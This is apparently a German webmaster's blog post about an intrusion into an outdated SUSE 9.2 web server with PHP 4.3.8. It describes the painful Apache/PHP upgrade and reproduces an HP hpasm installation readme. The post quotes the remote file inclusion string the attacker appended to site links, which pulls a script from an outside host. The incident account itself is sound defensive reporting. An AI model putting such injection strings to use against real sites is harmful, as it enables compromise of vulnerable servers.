Silvester 2008 - weil's so viel Spaß macht . . .
Sie laufen Jahre lang, die Suse 9.2 Server, bis es dann "Einer" spitz bekommt. Und schon werden die Löcher gescannt und abgeklopft und die Trojaner auf die Reise geschickt. Warum ausgerechnet auf einer "non profit" Seite ?
Bei einer 100 Mbit Leitung (eigentlich drei 100er Leitungen) sieht man es kaum noch, was an Scans läuft. Jedenfalls hatten wir eine "alte" PHP4 Installation 4.3.8 am laufen und sie lief über Jahre wunderbar.
Dann hat "jemand" die Lücke ausgespäht und auf einmal hingen in nur einem der auf diesem Server "wohnenden" Webs komische "Options" an den Links dran.
Noch einmal Glück gehabt ? mal sehen . . .
Zum Glück ist Typo3 doch einigermaßen dicht. So kam der Eindringling nicht allzu weit. Im "tmp"-Verzeichnis fand ich diese Datei:
http___63.114.215.100_shifrin_audio_BK401.jpg
"BK401" ist ein uralter Grundig Open Reel Videorecorder, von dem es auf diesem Server einige Bilder gibt. Die IP Nummer ist mir unbekannt und die Properties sagen nur aus, daß ich als "root" es nicht dort hin gestellt habe und auch mein "ssh Hilfsuser" war es nicht. Es war "der Webserver".
-rwxrwxr-x 1 wwwrun webuser 0 Nov 17 2004
Natürlich stinkt eine ausführbare jpg Datei mit 0 Byte zum Himmel, aber ich hatte es anfänglich übersehen. Was macht man damit ?? - also mit einer solchen Datei ?
Woran erkennt man Unregelmäßigkeiten ?
Beim ganz normalen Surfen über diese Seiten http://www.fernsehmuseum.info/ fällt einem (aufmerksamen) Besucher etwas auf und er sendet uns eine Mail.
Ist dies Absicht oder liegt ein Fehler vor?
und das ist der korrekte Teil der URL:
href="http://www.fernsehmuseum.info/autor-redlich.0.html?(hier geht es weiter)
und das hing auf einmal ganz dicht (und in einer Zeile!!) hinten dran:
&L=02Fdisplay.php%3Fs%3Dhttp%3A%2F%2Fwww.reasons.org%2Ftnrtb%2
Fwp-content%2Fbackup-b2b23%2Fid2.txt%3F%3F
Dann kam das Großreinemachen
Nach Durchsicht der PHP Löcher wurde die Version 4.3.8 dringen zum Update auf 4.3.11 angemahnt. Doch ich habe lieber gleich die 4.4.7 als gzip Datei versucht. (Das sei die letzte verfügbare PHP4 Version.) Das ging natürlich voll daneben und der (Apache-) Server (unser www6.ipw.net) war am 1.1.2008 gleich mal für einige Stunden down.
Nach weiteren Recherchen (hatte auch einige Stunden gekostet) hat sich das Übertragen aller Webs auf einen der neueren Typo3 4.1.5 Server (mit PHP 5.2) als (vermutlich) sehr zeitaufwändig dargestellt, also war doch die Reparatur (unseres Typo3 3.6.x Servers) samt Update angesagt.
Gelandet bin ich um Mitternacht bei Apache 2.2.2 mit PHP 4.4.0 vom ftp.suse.com Server (beides für Suse 9.2 als RPM verfügbar). Die Updates von Hand (mit der Kommandozeile) sind an den Abhängigkeiten total gescheitert und die Updates mit Yast waren nicht gerade berauschend.
Eigentlich war es ein einziger Knorz, (Try and Error - Versuch und Irrtum) wie oft ich PHP 4.3.8 deinstallieren mußte und Apache 2.0 ebenso, weil irgend ein altes Programm einfach nicht verschwinden wollte und den Neuzugang ausgebremst bzw. blockiert hatte. Auch beim Installieren wurden immer wieder Module als fehlend angemosert, die eigentlich alle mal da waren.
Erst die Kopieraktion der Apache 2.2.2 und PHP 4.0 Module per FTP-Client auf meine lokale Win2000 Work-Station und dann mit WINSCP auf den Webserver und dann mit einer Einbindung des "lokalen Installationsverzeichnisses" in Yast parallel zu dem weltweit letzten Suse 9.2 Server (ftp.novell.hu) hat es letztendlich gebracht. (kurz vor dem Nervenzusammenbruch).
Und der ganz primitive mc (der Midnight Commander) geht immer noch nicht. Was hat denn der mit dem Apache zu tun ? Es ist alles sehr merkwürdig.
Der SNMP CLient war es dann gar nicht . . .
Irrtümlich hatte ich natürlich auf den SNMP 5.1.2 Agent getippt, als ich die komische Datei (weiter oben) in "tmp" gefunden hatte. Doch das SNMP war es gar nicht, das hätte andere Dateirechte und Owner/Gruppe hinterlassen.
Doch auch der veraltete SNMP 4.1.2 Agent musste dran glauben und damit unsere Server- Fernüberwachung. Denn das war ja der eigentliche Aufhänger aller dieser Seiten, wir müssen die Server lückenlos im Griff haben, also nicht nur die "http" Verfügbarkeit abfragen. Jetzt läuft auf der Suse 9.2 der net-snmp 5.4 Client.
Und wenn alles wieder geht, wird HPASM wieder aktiviert
Der ursächliche Grund für all den Aufwand mit den Gesundheits-Agents und Clients ist, daß ich vorher gewarnt sein will, bevor das Raid den Geist aufgibt. Und das macht Compaq's Insight Manager oder jetzt HP's hpasm. Wenn die erste Platte ausfällt, geht ein rotes Lämpchen (auf unserem LCD Schirm) an und der Server schreit laut(los), also zu leise.
Und dazu muß jetzt net-snmp 5.4.1 ran.
Hier die hpasm Versionen, die bei uns auf Suse 9.2 laufen.
hpasm-7.3.0c-67.sles9.i586.rpm
hpasm-7.3.0c-67.sles9.i586.rpm.txt
hpasm-7.7.0-115.sles9.i586.rpm
und gerade eben, als ich dies schreibe (März 2008), geht schon der RAID-SCSI Agent nicht mehr ??? - Was ist das ?
und hier der Text mit wichtigen Kommandos zum Deinstallieren
Filename: hpasm-7.3.0c-67.sles9.i586.rpm
Title: HP Server Management Application and Agents for SUSE LINUX Enterprise Server 9 (x86)
Version: 7.3.0c-67
Language: English
Category: Driver - System Management
Division: Industry Standard Servers
Operating Systems: SUSE LINUX Enterprise Server 9 (x86)
System Configuration: All shipping configurations
Prerequisites: N/A
Effective Date: 6/24/05
Electronic Distribution Allowed: YES
Softpaq Utility Version: N/A
Supercedes: N/A
Description:
This RPM is used to provide server management capabilities for SUSE LINUX Enterprise Server 9 (x86) installed on supported server systems.
Enhancements:
- Fixed an issue that Smart Array agent (cmaidad) may keep sending invalid inquiry to Smart Array P600 SAS RAID controller.
- Resolved possible segmentation fault with agent daemon when specific data files were accessed.
- Added additional RPM naming conventions to specify Linux Distribution. This allows automated placement of files for deployment tools (such as Red Hat Satellite Server) that attempt to put deliverables in the following format: /var/satellite/NAME-VERSION-RELEASE.
Notes
The HP Server Management Application and Agents contain the following drivers and agents:
Advanced Server Management application (Health Driver)
Integrated Management Log (IML) Viewer Application
Foundation Agents
Health agent (formerly in the Server Agents package)
Standard equipment agent (formerly in the Server Agents package)
Server peer agent (formerly in the Server Agents package)
Storage agents
The Advanced Server Management (health) driver can be recompiled on a non-default (or errata) Linux Kernel. If you would like to install or create the RPM for a non-default kernel, you must also install the kernel sources for your compiled kernel. In addition, the development packages required for rebuilding a kernel need to be present.
Installation
Login as the system administrator (root), download the RPM to a directory on your hard drive and change to that directory.
If a previous version of the Health Driver or Insight Management agents has been installed, they must be removed before this package can be installed. Any packages dependent on the Health Driver must also be removed. To check which version of the Health Driver (if any) is on the system, type:
rpm –q hpasm
The rpm -q command may also be used to check for the existence of dependent packages. There is no need to uninstall packages that are not present on the system.
To remove the previous version and any packages dependent on it, type the following, in order:
rpm –e cmanic
rpm –e hprsm
rpm –e hpasm
NOTE: You should update your snmp agents prior to installing the hpasm package.
To install the package, type:
rpm -ivh hpasm-< version >.rpm
The application and agents will be installed immediately. The NIC Agents must be downloaded and installed separately.
To check whether the package is loaded properly, type:
/etc/init.d/hpasm status
You should see entries for the following:
hpasmd – Health Application
Status of Foundation Agents (cmafdtn): cmawebd cmathreshd cmahostd cmapeerd
cmathreshd
cmahostd
cmapeerd
Status of Server Agents (cmasvr): cmastdeqd cmahealthd cmaperfd
cmastdeqd
cmahealthd
cmaperfd
Status of Storage Agents (cmastor): cmaeventd cmaidad cmafcad cmaided cmascsid
cmaeventd
cmaidad
cmafcad
cmaided
cmascsid (if server has a SCSI controller supported by agents)
If you attempt to install the RPM on an unsupported system, you will get an error message. The driver will not be operational and it is advisable to uninstall the driver at your earliest convenience.
Running the health driver:
Once installed, the health driver will be automatically loaded every time the server boots. Several /proc entries are available when the driver is running.
Additional information and help is available by typing:
man hpasm
Running the agents:
The agents require an SNMP stack to be available. If SNMP support is not installed on the system, the agents will not load. The HP provided SNMP stack is required for the management agents to be enabled. This component is available here: www.compaq.com/support/files/server/us/download/20702.html. If the agents are not loaded, the health driver will still function normally.
Running the IML Viewer Application:
The HP ProLiant Integrated Management Log (IML) Viewer is an application that runs in the X-Windows environment. Execute the following command to start the IML Viewer:
cpqimlview
The HP ProLiant Integrated Management Log Viewer automatically displays the current entries of the Integrated Management Log.
Additional information and help is available by typing:
man cpqimlview
Previous versions of the health driver and agents are available on ftp.compaq.com. To ensure the latest technology and bug fixes, HP recommends the use of this package over previous versions of the driver and agents.
MD5 CHECKSUM:
e3d9839d18e397047256f9983e690d79 hpasm-< version >.sles9.i586.rpm
Additional information about features, installation, use, and troubleshooting the HP Server Management Drivers and Agents is available in the HOWTO documents available here: www.compaq.com/products/servers/linux/documentation.html.
systems supported
family models
HP ProLiant BL45p All Models
HP ProLiant BL40p All Models
HP ProLiant BL35p All Models
HP ProLiant BL30p All Models
HP ProLiant BL25p All Models
HP ProLiant BL20p G3, G2, (1.4GHz)
HP ProLiant BL10e G2, (700-900MHz)
HP ProLiant DL760 G2
HP ProLiant DL740 All Models
HP ProLiant DL585 All Models
HP ProLiant DL580 G3, G2, (700-900MHz)
HP ProLiant DL560 All Models
HP ProLiant DL385 All Models
HP ProLiant DL380 G4, G3
HP ProLiant DL360 G4 / G4p, G3
HP ProLiant DL320 G3, G2, (800-1.5GHz)
HP ProLiant ML570 G3, G2, (667-1000MHz)
HP ProLiant ML530 G2, (667-1000MHz)
HP ProLiant ML370 G4, G3
HP ProLiant ML350 G4 / G4p, G3
HP ProLiant ML330 G3, G2
HP ProLiant ML310 G2
Ende dieses Textes. Dieser Text dient nur zur Information.
Wir haben März 2008 und darum: Finger weg von der Suse 9
Doch das war es scheinbar noch nicht.
Ich vermute, der Hacker (oder ganove) spricht erst mal kein Deutsch und hat sich sein Ziel wahllos ausgesucht. Denn alle anderen auf diesem Server befindlichen Webs hatten dieses Phänomen nicht.
Jedenfalls hat er immer noch seinen Kochlöffel mitten in der Adresszeile (Jan 2008).